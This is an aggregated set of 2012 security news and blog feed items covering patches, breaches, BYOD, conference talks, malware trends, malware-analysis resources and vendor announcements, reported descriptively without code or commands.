==> Oracle patch preview: prepare for a 'major' release

http://www.infosecurity-magazine.com/rss/news/ Along with crisp weather and autumn fashions, patch season has arrived: Oracle has pre-released information on the patches expected in its quarterly Critical Patch Update (CPU) on Oct. 16.

==> RSA Europe 2012: PCI compliance deflects attention from more important security risks

http://www.infosecurity-magazine.com/rss/news/ Is the IT security industry getting better at defending against threats? According to Josh Corman of Akamai Technologies, the answer is no, and there are some fundamental reasons why.

==> New GCHQ Territorial (Spook) Army

http://www.infosecurity-magazine.com/rss/news/ The UK's Territorial Army is a paid force of part-time volunteers that make up around 25% of the army's manpower. It is considered an essential part of the UK's defense force. Now GCHQ is thinking of using the same principle to bolster the UK's cyber defense.

==> Malicious emails: Romney almost President

http://www.infosecurity-magazine.com/rss/news/ A new malicious email campaign pretends to be from CNN. It announces breaking news: Mitt Romney is almost president. But it leads to a Blackhole exploit site.

==> Firefox 16 shipped, pulled and updated within 2 days

http://www.infosecurity-magazine.com/rss/news/ Firefox 16 was released on Tuesday, pulled from the download page on Wednesday, and replaced with Firefox 16.0.1 on Thursday. The main cause was that Tuesday's version introduced a new critical bug that was fixed by Thursday.

==> BYOD introduces gaping security holes for businesses

http://www.infosecurity-magazine.com/rss/news/ Bring your own device (BYOD) is gaining more and more ground within enterprises, as employees are increasingly using their personal smartphones and tablets to check email, edit documents and do other work. As a big trend affecting how businesses operate online, it is translating into ever-more complex security requirements for business IT.

==> Massive data breach at Florida college hits 279,000 students and employees

http://www.infosecurity-magazine.com/rss/news/ A large information breach at Northwest Florida State College has compromised the personal information of about 279,000 students and employees, according to the Florida Department of Education.

==> Law enforcement-grade malware increasingly used to target dissidents

http://www.infosecurity-magazine.com/rss/news/ Malware developed by the 'good guys' is increasingly falling into the wrong hands, according to a new report from Citizen Lab. The organization says that there is evidence of a growing commercial market for offensive computer network intrusion capabilities developed by security companies in Western democratic countries.

==> SMBs more vulnerable to data breaches than larger brethren

http://www.infosecurity-magazine.com/rss/news/ Contrary to conventional wisdom, hackers don't just target large enterprises with vast amounts of data to steal. Small- and medium-sized businesses are just as attractive as targets, and in some cases more so.

==> RSA Europe 2012: Anonymous responds to Corman’s comments

http://www.infosecurity-magazine.com/rss/news/ Anonymous has very few hackers; it has very few activists. It is very misleading to call the groups hacktivists. The common attribute is angst. The talented ones are either quitting or starting to do things that are more clandestine.

==> BYOA – the latest BYOx acronym to cause IT headaches

http://www.infosecurity-magazine.com/rss/news/ There is a large and still growing lexicon of BYOx acronyms: bring your own device, danger, services... Now Citrix adds detail to one of the latest threats: Bring Your Own Apps.

==> Teen hacker earns $60K for full Google Chrome exploit

http://www.infosecurity-magazine.com/rss/news/ A teenage hacker with the handle 'Pinkie Pie' has nabbed a $60,000 prize from Google, for launching a full Chrome exploit for the second time.

==> First annual report of cyber incidents in the EU

http://www.infosecurity-magazine.com/rss/news/ The European Network and Information Security Agency (ENISA) has published its first Annual Incidents Report from data supplied in conformance with Article 13a of the EUs telecom reform directive.

==> RSA Europe 2012: Cloud computing has potential to drive greater security

http://www.infosecurity-magazine.com/rss/news/ During a keynote session at today's RSA Europe Conference in London, Qualys chairman and CEO, Philippe Courtot, said the cloud can be a security enabler, despite many organizations' continued hesitance to adopt widespread cloud technologies out of concerns over security and a lack of control.

==> RSA Europe 2012: Symantec reports on trends, malicious server admin, and another Android trojan

http://www.infosecurity-magazine.com/rss/news/ The latest monthly intelligence report from Symantec shows current trends in spam, phishing, malware and malicious websites; but also provides insight in how criminals administer a compromised server, and describes a solar-powered Android app.

==> Rapid7 buys BYOD security firm Mobilisafe

http://www.infosecurity-magazine.com/rss/news/ Rapid7, the security risk assessment company behind Nexpose and Metasploit, has expanded its reach into the BYOD sphere with the purchase of Mobilisafe, a Seattle-based mobile risk management company.

==> Nat West suspends GetCash app following reports of fraud

http://www.infosecurity-magazine.com/rss/news/ GetCash was launched a few months back to allow customers who had forgotten their bank card (but not their mobile phone) to withdraw up to £100 as emergency cash from an ATM. Helpful banking; but for now it is suspended.

==> RSA Europe 2012: UK’s ID Assurance Programme puts verification choice into user’s hands

http://www.infosecurity-magazine.com/rss/news/ At this week's RSA Europe Conference in London, representatives from the UK Government outlined details of a pan-government model for identity assurance that engages the services of third-party ID verification providers.

==> Skype IM ransomware worm spreading quickly

http://www.infosecurity-magazine.com/rss/news/ Skype users are being subjected to a social engineering-based attack via instant message, where messages purporting to be from friends contain malicious links that infect computers with Dorkbot variants.

==> Almost half of UK businesses have suffered insider-led data breaches

http://www.infosecurity-magazine.com/rss/news/ For 48% of IT practitioners in the UK, the sensitive personal data contained in their company's databases and native or cloud applications has been compromised or stolen by a malicious insider, new research has revealed. And, the majority of those practitioners (65%) also agree that they find it difficult to comply with privacy and data protection regulations in production and development environments.

==> Android adware, Zitmo botnets and Romanian hackers, oh my!

http://www.infosecurity-magazine.com/rss/news/ We're not in Kansas anymore: The third quarter of 2012 saw a marked increase in Android adware, while new evidence surfaced suggesting that the Zeus-in-the-Mobile (Zitmo) banking trojan is evolving into a botnet. And, Romanian hackers are continuing to perform large-scale scanning for web vulnerabilities, according to the quarterly threat assessment from Fortinet.

==> RSA Europe 2012: Information Security Industry Must Fix Skills Gap says (ISC)2

http://www.infosecurity-magazine.com/rss/news/ Speaking to Infosecurity at RSA Europe on 09 October 2012, John Colley, managing director of (ISC)2 EMEA, declared the skills gap in the information security industry a big problem and suggested that entrance into the industry for graduates is dangerously difficult.

==> RSA Europe 2012: DDoS Attacks Used as Diversion Technique

http://www.infosecurity-magazine.com/rss/news/ DDoS attacks are being used as a component in the newly emerged multi-flank attacks, Symantec's deSouza told his audience at RSA Europe 2012 in London, 09 October 2012.

==> Spear-phishing – the cybercriminals’ scariest weapon

http://www.infosecurity-magazine.com/rss/news/ New research has looked at one of the cybercriminals' most effective and deadly weapons: the socially engineered spear-phishing attack. It is frequently the first visible phase of an APT-style attack; but can be defended.

==> RSA Europe 2012: Replace perimeter-based security with intelligence-based security, says Art Coviello

http://www.infosecurity-magazine.com/rss/news/ Art Coviello, executive vice president, EMC Corporation and executive chairman, RSA, opened RSA 2012 with a very clear message in his keynote: perimeter-based security strategies need to be replaced with intelligence-based strategies.

==> Bad Bad Piggies – beware of fakes

http://www.infosecurity-magazine.com/rss/news/ No slouches in spotting an opportunity, the bad guys have already focused on Rovio's new Angry Birds spin-off, Bad Piggies. Be careful what you install: it might be a real pig.

==> Telecom vendors Huawei, ZTE pose cyber-espionage threats, lawmakers conclude

http://www.infosecurity-magazine.com/rss/news/ Two top telecom infrastructure vendors from China, Huawei and ZTE, pose potential cyber-espionage threats, according to a panel of US lawmakers on intelligence.

==> Mac-focused malware is big and getting bigger

http://www.infosecurity-magazine.com/rss/news/ Despite the Mac reputation as being more secure because of Apple's tight control over its vertically integrated ecosystem, Mac-specific malware and advanced persistent attacks (APTs) against human rights groups are on the rise, cautions Citizen Lab Senior Security Analyst Seth Hardy.

==> World of Warcraft hit by hacking massacre

http://www.infosecurity-magazine.com/rss/news/ Apocalypse has come to World of Warcraft: whole cities have been massacred in the online adventure game, leaving nothing but smoking wreckage.

==> The 2012 Cost of Cyber Crime Report Says Successful Attacks Doubled

http://www.infosecurity-magazine.com/rss/news/ The 2012 Cost of Cyber Crime study is published today. It's good news and bad news. The frequency of successful cyber attacks has more than doubled over the last three years, but the annual cost to organizations has slowed dramatically in the last two years.

==> DarkAngle trojan masquerades as Panda Cloud AV

http://www.infosecurity-magazine.com/rss/news/ In a new twist to rogueware, Panda Security has warned that its cloud antivirus product name is being used to mask a particularly unpleasant trojan called DarkAngle. While victims may believe that they are installing anti-malware, they may actually be installing the malware itself.

==> American think tanks hit in wide-scale cyber-espionage push

http://www.infosecurity-magazine.com/rss/news/ American think tanks are becoming a big intelligence target for hackers from China and other countries, according to Rep. Mike Rogers (R-Mich.), chairman of the US House Intelligence Committee.

==> Veracode beefs up BYOD strategy with Marvin acquisition

http://www.infosecurity-magazine.com/rss/news/ Cloud-based application security testing vendor Veracode is bolstering its mobile app analysis practice area with the acquisition of Marvin Mobile Security for an undisclosed sum.

==> Top Android malware is adding features to cast a wider, more difficult-to-detect net

http://www.infosecurity-magazine.com/rss/news/ Android malware for premium SMS fraud continues to grow as a category, and most of it rests on the shoulders of one family of malware: Android.FakeInstaller. However, while FakeInstaller is well-known and included in mobile security software, hackers are now including new features geared to avoid detection and expand its reach.

==> Cybercriminality moves from guerilla to blitzkrieg

http://www.infosecurity-magazine.com/rss/news/ Cybercriminality is traditionally guerilla warfare: stay hidden, pop up, fight and run. But now RSA has detected a step-change in methodology - from hidden insurgency to full-frontal blitzkrieg involving 100 co-ordinated botnets.

==> Data loss, Wi-Fi and NFC identified as top mobile security concerns

http://www.infosecurity-magazine.com/rss/news/ Data loss is the biggest mobile security danger, reveals a new Cloud Security Alliance (CSA) report, but emerging concerns include rogue Wi-Fi access points and Near-Field Communications (NFC) exploitation.

==> UK plans £2M cybercrime center, as Hague warns of escalating international danger

http://www.infosecurity-magazine.com/rss/news/ Announcing that the UK is spending £2 million to set up a new cybercrime center, UK Foreign Secretary William Hague has warned that virtual threats are "one of the greatest global and strategic challenges of our time."

==> Obama or Romney? For public sector cybersecurity budgets, it may not matter

http://www.infosecurity-magazine.com/rss/news/ Hord Tipton knows a thing or two about the challenges infosec professionals face in the public sector. The executive director of (ISC)² and former CIO of the US Department of the Interior recently sat down with Infosecurity to discuss these issues.

==> FTC shuts down major international scareware scam

http://www.infosecurity-magazine.com/rss/news/ The US Federal Trade Commission has launched a major international crackdown on a scareware scam that has bilked consumers worldwide out of their tech support dollars in order to fix non-existent cyber-infections, freezing $180,000 of the alleged perpetrators' assets.

==> Profile Stalker – an application that spams on Tumblr

http://www.infosecurity-magazine.com/rss/news/ gr8brittyn posted on Tumblr: "Guys, I'm really sorry for the Profile Stalkr spam. If you haven't already, DON'T CLICK IT. I literally cannot figure out how to stop it and if you try to delete the posts, they're instantly reposted. I can't edit them, delete them, anything. PLEASE DO NOT CLICK!"

==> Smartphone Wi-Fi searches offer massive new data leakage vector

http://www.infosecurity-magazine.com/rss/news/ Our mobile phones are unwittingly giving away threat vectors to would-be hackers (and, for that matter, physical criminals as well), offering criminals a new way to tap information housed on smartphones.

==> HMRC chooses CPA-accredited encryption

http://www.infosecurity-magazine.com/rss/news/ HM Revenue and Customs (HMRC) chooses CPA over CAPS for its encryption (both are CESG-administered security accreditation schemes) and saves the British taxpayer 2.4 million.

==> CIOs not yet sitting at the top table

http://www.infosecurity-magazine.com/rss/news/ Ernst & Young has been analyzing the status rather than the role of the CIO within business and finds it wanting. Without sufficient status, the potential of the role is sorely hampered.

==> Universal man in the browser malware allows real-time information processing

http://www.infosecurity-magazine.com/rss/news/ Hackers who employ the man-in-the-browser (MiTB) gambit to steal information from computer systems have found a way to more efficiently cast their net. According to researchers at Trusteer, a new strain of MiTB malware can adopt a one-size-fits-all approach to collecting compromising data from websites, eliminating the time-consuming process of parsing through specific logs for the sensitive bits.

==> Anthem Blue Cross settles data breach lawsuit in California

http://www.infosecurity-magazine.com/rss/news/ California insurance company Anthem Blue Cross has settled a lawsuit brought by the State of California over a data breach brought about by a lack of appropriate information security processes at the insurer.

==> Fusion Center fail, says Senate Report

http://www.infosecurity-magazine.com/rss/news/ A US Senate Committee has produced a 140+ page report analyzing the operation and achievements of the hugely expensive fusion center programme and is far from satisfied with what it finds.

==> Ponemon Institute examines business logic attacks

http://www.infosecurity-magazine.com/rss/news/ A study by Ponemon Institute, commissioned by Silver Tail Systems, has examined what it calls 'business logic' attacks against websites. This is not hacking in the traditional sense. It is not breaking into a server and exfiltrating data; it is the abuse of the legitimate logic of a website.

==> Hosting company PRQ raided by the Swedish police

http://www.infosecurity-magazine.com/rss/news/ PeRiQuito AB, a Swedish web-hosting company better known as PRQ and even better known as a host for Wikileaks and one-time host of The Pirate Bay, has been raided for the third time by the Swedish police. The reason is not yet known.

==> BYOD is driving privacy concerns among enterprise workers

http://www.infosecurity-magazine.com/rss/news/ Workers are developing privacy fears that employers are keeping tabs on them through bring your own device (BYOD) management software, according to new research from Fiberlink.

==> Hacktivist campaign targets universities

http://www.infosecurity-magazine.com/rss/news/ Hacktivist collective Team GhostShell is continuing its mission of drawing attention to what it perceives as societal ills, with a hack of data servers at top-rated universities across the globe.

==> Serious Twitter security flaw leads to account hijacking for love and money

http://www.infosecurity-magazine.com/rss/news/ Just days after Twitter direct messages hit the news as spreading malicious links, a new Twitter security flaw has reared its head. Daniel Dennis Jones, previously known by his Twitter handle @blanket, has found a loophole that lets hackers hijack and put handles up for sale.

==> Verizon exec appointed to NSTAC

http://www.infosecurity-magazine.com/rss/news/ The National Security Telecommunications Advisory Committee is about to get a new member, from a company with a strong public sector presence: President Obama intends to appoint Verizon Enterprise Solutions (VES) President John Stratton to the NSTAC.

==> 4.5 million routers hacked in Brazil

http://www.infosecurity-magazine.com/rss/news/ More than 4.5 million DSL modems have been hacked in Brazil by exploiting a vulnerability in the firmware. All affected modems used a chip from Broadcom.

==> Anonymous #OpVendetta set for 5th November

http://www.infosecurity-magazine.com/rss/news/ This weekend saw a leaflet paperstorm in London, with masked anons handing out flyers proclaiming #OpVendetta slated for 5th November in London. Led by Anonymous UK and Ireland, it is, we are told, the biggest Anonymous protest in the UK yet seen.

==> File-sharing for personal use is not illegal in Portugal

http://www.infosecurity-magazine.com/rss/news/ The latest move by rightsholders in Portugal in the ongoing war against file sharers has backfired dramatically: the Portuguese Prosecutor has declared that P2P file-sharing for personal use is not illegal.

==> White House targeted by spear-phishing attack

http://www.infosecurity-magazine.com/rss/news/ Against a combined background of heightened cyber tensions with China and physical military tensions in the Far East, plus the White House preparing an executive order to replace the rejected Cybersecurity Act, comes news that it was targeted in a spear phishing attack.

==> Businesses still lack confidence in the cloud

http://www.infosecurity-magazine.com/rss/news/ The Cloud Security Alliance (CSA) and ISACA have issued their Cloud Market Maturity report, outlining the top 10 issues with cloud adoption by businesses. They found that confidence is lowest in government regulation as a factor in driving or securing the market.

==> Proposal floated for shortened, secure domain names for UK businesses

http://www.infosecurity-magazine.com/rss/news/ Nominet, the organization that runs the .uk domain name infrastructure, has issued a proposal for shortened domain names that feature comprehensive security features for businesses.

==> New Android trojan uses camera app to recreate user's physical surroundings

http://www.infosecurity-magazine.com/rss/news/ Indiana University and the US Navy have created an experimental Android spyware trojan that takes over a device's camera to take photos and build a 3-D model of the mobile user's surroundings. The information is then gathered and uploaded to a central server.

==> Level 3 enters the managed security market

http://www.infosecurity-magazine.com/rss/news/ Level 3 Communications has launched a new global security solutions portfolio meant to provide an integrated approach for enterprises, encompassing layered security services, Level 3's communications networking and professional services. The solutions will be rolled out in a managed services environment.

==> Verizon rolls out HIPAA-compliant healthcare security portfolio

http://www.infosecurity-magazine.com/rss/news/ Verizon Enterprise Solutions is focusing on the secure storing of electronic protected health information (ePHI) in its Terremark data centers as part of a new comprehensive cloud and data center infrastructure portfolio, specifically designed to help the healthcare industry meet the US federal Health Insurance Portability and Accountability Act (HIPAA) requirements.

==> ICO poised to fine illegal marketers

http://www.infosecurity-magazine.com/rss/news/ Earlier this year the ICO asked the public to report calls or texts received from an unknown sender using an online survey. It has received more than 30,000 complaints and today announced that it is set to issue two monetary penalties totaling well over 250,000 to two illegal marketers.

==> Rogue Pharma, Fake AV Vendors Feel Credit Card Crunch

http://www.krebsonsecurity.com/feed/ New research suggests that companies behind some of America's best known consumer brands may be far more effective at fighting cybercrime than any efforts to enact more stringent computer security and anti-piracy laws. Recent legislative proposals in the United States -- such as the Stop Online Piracy Act -- have sought to combat online trafficking in copyrighted intellectual property and counterfeit goods by granting Internet service providers and authorities broader powers to prosecute offenders, and by imposing stronger criminal penalties for such activity. But recent data collected by academic researchers suggests that brand holders already have the tools to quash much of this activity.

==> Critical Java Patch Plugs 30 Security Holes

http://www.krebsonsecurity.com/feed/ Oracle on Tuesday pushed out a bevy of security patches for its products, including an update to Java that remedies at least 30 vulnerabilities in the widely-used program.

==> The Scrap Value of a Hacked PC, Revisited

http://www.krebsonsecurity.com/feed/ A few years back, when I was a reporter at The Washington Post, I put together a chart listing the various ways that miscreants can monetize hacked PCs. The project was designed to explain simply and visually to the sort of computer user who can't begin to fathom why miscreants would want to hack into his PC. "I don't bank online, I don't store sensitive information on my machine! I only use it to check email. What could hackers possibly want with this hunk of junk?" are all common refrains from this type of user. I recently updated the graphic (below) to include some of the increasingly prevalent malicious uses for hacked PCs, including hostage attacks -- such as ransomware -- and reputation hijacking on social networking forums.

==> Critical Adobe Flash Player Update Nixes 25 Flaws

http://www.krebsonsecurity.com/feed/ Adobe has issued an update for its Flash Player software that fixes at least 25 separate security vulnerabilities in the widely-installed program. The company also pushed out a security patch for its Adobe AIR software.

==> ‘Project Blitzkrieg’ Promises More Aggressive Cyberheists Against U.S. Banks

http://www.krebsonsecurity.com/feed/ Last week, security firm RSA detailed a new cybercriminal project aimed at recruiting 100 botmasters to help launch a series of lucrative online heists targeting 30 U.S. banks. RSA's advisory focused primarily on helping financial institutions prepare for an onslaught of more sophisticated e-banking attacks, and has already received plenty of media attention. I'm weighing in on the topic because their analysis seemed to merely scratch the surface of a larger enterprise that speaks volumes about why online attacks are becoming bolder and more brash toward Western targets.

==> Chinese Hackers Blamed for Intrusion at Energy Industry Giant Telvent

http://www.krebsonsecurity.com/feed/ A company whose software and services are used to remotely administer and monitor large sections of the energy industry began warning customers last week that it is investigating a sophisticated hacker attack spanning its operations in the United States, Canada and Spain. Experts say digital fingerprints left behind by attackers point to a Chinese hacking group tied to repeated cyber-espionage campaigns against key Western interests.

==> Espionage Hackers Target ‘Watering Hole’ Sites

http://www.krebsonsecurity.com/feed/ Security experts are accustomed to direct attacks, but some of today's more insidious incursions succeed in a roundabout way -- by planting malware at sites deemed most likely to be visited by the targets of interest. New research suggests these so-called "watering hole" tactics recently have been used as stepping stones to conduct espionage attacks against a host of targets across a variety of industries, including the defense, government, academia, financial services, healthcare and utilities sectors.

==> New Search System, No More Accounts Needed [1]

http://www.offensivecomputing.net/?q=node/feed The new search system with the updated authentication system is online. There is still some missing functionality but it should let everyone download samples. If you find any problems please let me know. There will be some quirks as we move to the new version of the website. If you find any bugs please let me know on Twitter @openmalware. Danny [1] You still need a Google account to download the samples

==> State of Offensive Computing

http://www.offensivecomputing.net/?q=node/feed I would like to take this time to thank everyone that expressed their support while Offensive Computing was offline. It was a trying time and I really appreciate everyone's support. Without getting into any of the specifics of why the site was offline for two months, we are back and here to stay.

There are a couple of people who were instrumental in helping to keep everything up and running. Paul Royal, from the Georgia Tech Information Security Center, helped out significantly with hardware and the new home of the site. Kelcey Tietjen also stepped in and helped out tremendously. If you see either of them at some upcoming conferences (hint: Paul is giving a talk at Blackhat) buy them a drink.

There are a couple of changes that are going to happen that more accurately reflect the intentions of the site. First, the name will be changing to Open Malware. The new name more accurately reflects the purpose and intention of the site. Way back in 2005 the intention was to make this a place where you could find information related to malware and other types of hacking. As things (and life) have progressed it has changed into a malware research site, specifically with the ability to download malware samples. The domain will be OpenMalware.org in the very near future.

The second big item of news is that we will be transitioning to a download-only malware repository in the coming weeks. The blog site will be officially shutting down. There are much better forums maintained by commercial services that have taken up the role of a discussion area. Specifically the /r/ReverseEngineering and /r/Malware sub-Reddits, and OpenRCE are better avenues of communication. I will maintain a static version of the site to archive the old content.

To accommodate the new download site, there will be a couple of changes. First, a lot of the back end software has changed. Searches will be faster, more malware will be available, and the overall maintenance will be a lot easier. Second, you will need to have a valid, verified Google Account. Having a Google account allows us to use industry standard authentication, and most importantly not to have to maintain a user database. Get one here if you haven't already. In the meantime new account creation is disabled while we make the transition. Old accounts should work as normal.

Finally, we are discontinuing our commercial services. I would like to thank all of our customers for their business. You all helped to support this site and maintain an open service. We will be looking at transitioning to a non-profit status in the coming years. Thanks again, Danny Quist

==> VizSec 2012 Call for Papers Out

http://www.offensivecomputing.net/?q=node/feed VizSec 2012 will be held in mid-October as part of VisWeek in Seattle. Papers are due July 1.

The International Symposium on Visualization for Cyber Security (VizSec) is a forum that brings together researchers and practitioners from academia, government, and industry to address the needs of the cyber security community through new and insightful visualization techniques. Co-located this year with VisWeek, the 9th VizSec will provide new opportunities for the usability and visualization communities to collaborate and share insights on a broad range of security-related topics. Accepted papers will appear in the ACM Digital Library as part of the ACM International Conference Proceedings Series.

Important research problems often lie at the intersection of disparate domains. Our focus is to explore effective, scalable visual interfaces for security domains, where visualization may provide a distinct benefit, including computer forensics, reverse engineering, insider threat detection, cryptography, privacy, preventing 'user assisted' attacks, compliance management, wireless security, secure coding, and penetration testing in addition to traditional network security.

Human time and attention are precious resources. We are particularly interested in visualization and interaction techniques that effectively capture human analyst insights so that further processing may be handled by machines, freeing the analyst for other tasks. For example, a malware analyst might use a visualization system to analyze a new piece of malicious software and then facilitate generating a signature for future machine processing. When appropriate, research that incorporates multiple data sources, such as network packet captures, firewall rule sets and logs, DNS logs, web server logs, and/or intrusion detection system logs, is particularly desirable.

More information is on the web site: http://www.ornl.gov/sci/vizsec

==> Scalable, Automated Baremetal Malware Analysis

http://www.offensivecomputing.net/?q=node/feed This week I will be presenting on scalable, automated baremetal malware analysis at Black Hat Europe. My presentation will coincide with the release of NVMTrace, a tool that facilitates automated baremetal sample processing using inexpensive hardware and freely available technologies. More information is available at the following link: Entrapment: Tricking Malware with Transparent, Scalable Malware Analysis If you are attending Black Hat Europe and malware analysis is a topic of interest to you, please attend my talk. If you are interested but will not be in attendance, please let me know and I will make my whitepaper and slide set available to you.

==> BHO Reversing

http://www.offensivecomputing.net/?q=node/feed For a long time now (BHO has been supported since IE 4.0) malware writers have exploited BHO functionality to prey on IE users. Mostly, an evil BHO has two functions (at least if we talk about bankers): - monitoring/logging of requests sent by the browser (POST dump) - password stealing - dynamic modification of HTML page code (HTML code injection), used e.g. for adding additional form fields intended to obtain a larger number of TAN codes or generally some (...) Read the entire post here: BHO Reversing

==> Practical Malware Analysis - A Book Review and Curmudgeonly Rant on the State of Reverse Engineering

http://www.offensivecomputing.net/?q=node/feed Recently I was asked to review a pre-publication copy of Mike Sikorski and Andrew Honig's book Practical Malware Analysis by No Starch Press. I gave it an enthusiastic review, and I strongly believe this will become the de facto text for learning malware analysis in the future. This is a review of that book, and a short rant on reverse engineering.

Before getting into Practical Malware Analysis, I hope you will indulge me in a rant about other books on the reverse engineering topic: They are not pretty. If you've taken one of my classes I recommend a few books for learning reversing, but climbing the steep mountain of prerequisite material before you can attempt to be somewhat proficient is daunting. Specifically, the books I recommended were based off of each individual author's own personal style of reverse engineering with the tools that were available at the time. The field has gotten much more accessible thanks to the awesome tools that are out there from companies like Hex-Rays and Zynamics.

Practical Malware Analysis does a good job of tying together the methods of modern malware analysis. While most of the previous texts have done a good job of presenting the state of the art at their time, PMA overviews many of the tools that are in use in the modern day. Part 1 starts off with the basic static techniques, how to set up a virtual environment, and dynamic analysis. These initial steps are the basis for any good reversing environment. What is nice is that these topics aren't dwelled on for an entire book. Part 2 goes over the relationships of the Intel architecture, IDA Pro, modern compilers, and the Windows operating system to reverse engineering. Having an understanding of this as it applies to the reversing process is extremely important. Outside of implementing a compiler, learning the fundamentals of the architecture is the most important skill a reverser can have for understanding the field. The difference between an adequate reverser and a great reverser lies in the understanding of how the system interactions work.

The rest of the book is focused on the advanced topics of dynamic analysis. Part 5 deals with all the ways that malware authors can make your life miserable, from anti-disassembly to packers. Part 6, Special Topics, talks about shellcode analysis, C++ specifics, and the ever-looming threat of 64-bit malware. I suspect that there will be a second edition once 64-bit malware comes into vogue.

Overall the book is excellent for those that are new to this field. Experts love to curmudgeonly talk about how nothing is new anymore, everything sucks, and pine for the good old days of reverse engineering with some wire-wrap, a lead pencil, a 9-volt Duracell, and a single LED. If you consider yourself one of these people, reading this book is going to feel a lot like wearing someone else's underwear. If, on the other hand, you read it and put aside your natural skepticism of all things new, you might learn something. I really do like this book.

Edit 3/4/2012: I have no financial interest in the book. The only thing I received was a reviewer's copy. This was not sponsored or paid for in any way by the authors or publishers.

==> CAST Slides: Hunting malware with Volatility v2.0

http://www.offensivecomputing.net/?q=node/feed Last week I gave a talk at the CAST forum about hunting malware with Volatility 2.0. On 40 slides I introduce the main features of this powerful forensic framework. All memory dumps being discussed are snapshots from infected machines with modern malware and rootkits. http://reconstructer.org/papers/Hunting%20malware%20with%20Volatility%20v2.0.pdf

==> Introduction to IDA Python

http://www.offensivecomputing.net/?q=node/feed The Introduction to IDA Python document by Ero Carrera is one of the better documents on scripting the IDA Pro platform available. After talking with Ero directly, I have received permission to host the PDF directly on Offensive Computing to make it available long-term. Enjoy. Introduction to IDA Python by Ero Carrera Danny

==> CSI:Internet series - Spyeye detection with Volatility v2 and kernel debugging the TDL4 rootkit

http://www.offensivecomputing.net/?q=node/feed Just in case you missed my forensic analysis contributions for the CSI:Internet series on h-online.com... CSI:Internet - A trip into RAM http://www.h-online.com/security/features/CSI-Internet-A-trip-into-RAM-1339479.html CSI:Internet - Open heart surgery http://www.h-online.com/security/features/CSI-Internet-Open-heart-surgery-1350313.html Enjoy!

==> Computer Security Jobs Board

http://www.openrce.org/rss/feeds/blogs written by CompuSecJobs.

==> PAGE_EXECUTE_WRITECOPY As Anti-Debug Trick

http://www.openrce.org/rss/feeds/blogs written by waleedassar.

==> Thread Injection Finder Tool

http://www.openrce.org/rss/feeds/blogs written by palaniyappan.

==> darkc0de.net

http://www.robtex.com/dns/darkc0de.net.rss Summary: Darkc0de.com and darkc0de.org are similar domain names. Also check www.darkc0de.net. It has six inlinks. Trustworthiness, vendor reliability and privacy of this site is very poor (WOT). It is listed in one blacklist (multi.surbl.org). Total score 0/50, normalized to 1 out of 5 based on 5 tests. The record also lists the .net gTLD name servers and their VeriSign routes; that DNS dump is omitted here.

==> Caribbean Bookstore Owner Protects Business and Residence with MobileCamViewer

http://www.securitypark.co.uk/rss/rss_main.asp The Caribbean life has its perks, but business owners and residents deal with the same property-related security concerns as most populated countries. Therefore, it's no surprise that mobile surveillance is catching on across more Caribbean nations as service providers upgrade from 2G to 3G technology. Elston Lewis, owner of Family Bookstore on the island of St. Maarten, launched his mobile su ...[more]

==> ForeScout CounterACT 7 Extends Best-In-Class NAC to Accelerate BYOD Results

http://www.securitypark.co.uk/rss/rss_main.asp ForeScout Technologies, Inc., a leading provider of automated security control solutions for Global 1000 enterprises and government organisations, today recast the network access control (NAC) landscape with the release of ForeScout CounterACT 7 delivering hybrid 802.1X and agentless NAC functionality that makes it easier to deploy, manage and scale network access control, particularly for organ ...[more]

==> Zscaler's ThreatLabZ launches free mobile app profiler to help users assess their risk

http://www.securitypark.co.uk/rss/rss_main.asp Zscaler, the leader in secure cloud gateway solutions, announced today the results of an analysis from ThreatLabZ, the company's security research arm, which reveals that up to 10 percent of mobile apps expose user passwords and login names, 25 percent expose personally identifiable information and 40 percent communicate with third parties. The analysis was done using the new Zscaler Application P ...[more]

==> School Attendance System with Nephsystem 2.45GHz Active RFID

http://www.securitypark.co.uk/rss/rss_main.asp RFID technology has been applied to attendance systems in recent years. However, there are still some limitations, such as the information visualization of the RFID tag and short reading coverage. Our latest active RFID product, the NSAR-800 active RFID reader and tag, will help to optimize the school attendance system. The Operation of the system: RFID school attendance systems save manual paper admini ...[more]

==> NFC Manned Guarding Solutions have arrived

http://www.securitypark.co.uk/rss/rss_main.asp Reslink Solutions are a firm of NFC (near field Communications) specialists who have been providing real-time security guard touring solutions for many companies including G4S and Securitas. Using the latest NFC embedded mobile devices managers are able to view the exact patrol route that their operatives have taken whilst on tour. All route data is accessible in real-time via a secure web portal. ...[more]

==> New Business Models & Disruptive Technologies Shift Security from a Cost Centre to a Cash Generator

http://www.securitypark.co.uk/rss/rss_main.asp The total value of the world's security equipment market at factory gate prices in 2012 was $20.57bn. Of this Video Surveillance products at $10bn took a share of 49%. The value of M&A deals in 2012 declined to $7.168 billion a fall of 27%. Poor economic trading conditions reduced the confidence of major suppliers to go for growth through M&A. Although we don't expect this to continue and forec ...[more]

==> NFC Wristbands Give People a More Optimistic Payment Life through NFC Technology

http://www.securitypark.co.uk/rss/rss_main.asp With the introduction of NFC technology, identification information flows faster than it ever did, via NFC wristbands at the World Cup, music parties and events. And as the big wave of NFC wristbands has been lifted in the market, DAILY RFID released its latest NFC Wristband-01 to give people a more optimistic payment life. Going to a concert or festival party with the NFC wristbands will le ...[more]

==> NFC Card Allows People to Enjoy Pleasant Payment with an NFC-enabled Smartphone

http://www.securitypark.co.uk/rss/rss_main.asp Since the advanced NFC technology has made its way into the business card nowadays, gone are the long queues due to waiting for credit card transactions to go through. And as one of the most professional RFID manufacturers in China, DAILY RFID has released its latest RFID NFC card-02 for NFC-enabled smartphones, like iPhone and Android, to accelerate the payment process. Compliant with ISO 14443 standar ...[more]

==> ValidSoft says NatWest Get Cash App problem is easily solved

http://www.securitypark.co.uk/rss/rss_main.asp "NatWest's decision to suspend its Get Cash App was a wise one, and what this incident highlights is the fact that security is an increasingly important part of any bank's customer service. "The security loophole with the Get Cash App would appear to be a very basic one and similar to attacks on online accounts that use PINs and passwords. In order to use the App, one needs to be registered fo ...[more]

==> Brocade Fabric Switches to provide networking support for new Hitachi Unified Compute Platform

http://www.securitypark.co.uk/rss/rss_main.asp Brocade (Nasdaq: BRCD) announced that several of its Ethernet and storage area networking (SAN) fabric switches have been integrated by Hitachi Data Systems for networking technology in the new Hitachi Unified Compute Platform (UCP) converged infrastructure solutions, which were announced today. Brocade is delivering both top-of-rack switches as well as embedded server switches based on Fibre Chan ...[more]

==> Book Review: This Machine Kills Secrets

